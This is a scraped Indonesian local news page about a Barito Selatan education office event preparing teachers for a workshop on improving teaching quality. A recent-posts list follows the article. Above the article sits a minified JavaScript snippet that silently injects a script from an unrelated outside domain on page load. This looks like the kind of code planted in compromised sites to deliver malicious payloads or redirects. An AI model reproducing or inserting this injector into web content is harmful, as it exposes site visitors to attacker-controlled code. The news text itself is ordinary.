(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Peningkatan Kapasitas Mutu Pendidik, Imtaq dan Literasi di Barsel


BUNTOK, Dinas Pendidikan (Diknas) Barito Selatan (Barsel) menggelar audiensi dan sosialisasi program unggulan Apkasi bidang peningkatan kapasitas mutu pendidik, imtaq serta literasi di aula Setda Barsel, Selasa (1/10).

Sekretaris Diknas Leliana mengatakan, kegiatan sosialisasi yang dihadiri oleh para kepala sekolah memberikan penjelasan persiapan untuk workshop demi meningkatkan tarap mutu para pendidik di Barsel.

“Jadi pada hari ini kita gelar audiensi dan sosialisasi bagaimana mengajar yang lebih baik lagi, untuk bisa kita terapkan di Barsel nanti,” kata Leliana kepada Kanalkalimantan.com.

Ia juga mengatakan, lewat kegiatan hari ini semua dijelaskan dan dipaparkan kepada semua peserta mempersiapkan siapa saja wakil mereka pada kegiatan workshop pada akhir bulan nanti.

“Jadi pada kegiatan workshop nanti semua para tenaga pendidik diberi bekal bagaimana cara mengajar yang baik, membuat peserta didik lebih cepat mengerti dan tidak bosan,” ucap Leliana.

Contoh materi yang akan diberikan pada workshop nanti, salah satunya memberikan pelajaran menghitung dengan cara yang cepat, namun tidak membuat anak didik bosan dan cepat paham.

“Jadi metode yang akan diberikan sudah berhasil di daerah lain seperti daerah ibu kota Jakarta dan ini yang ingin kita terapkan di Barsel,” ujar Leliana.

Sasaran untuk para pengajar yang akan mengikuti kegiatan nanti adalah para guru dari tingkat TK, SD dan SMP.

“Yang jelas lewat kegiatan workshop itu nanti kita ingin tingkat mutu pengajar di Barsel bisa lebih meningkat lagi,” pungkas Leliana. (digdo)

Reporter : Digdo
Editor : Bie

Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

1 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

2 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

3 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

4 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

8 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

10 jam ago

This website uses cookies.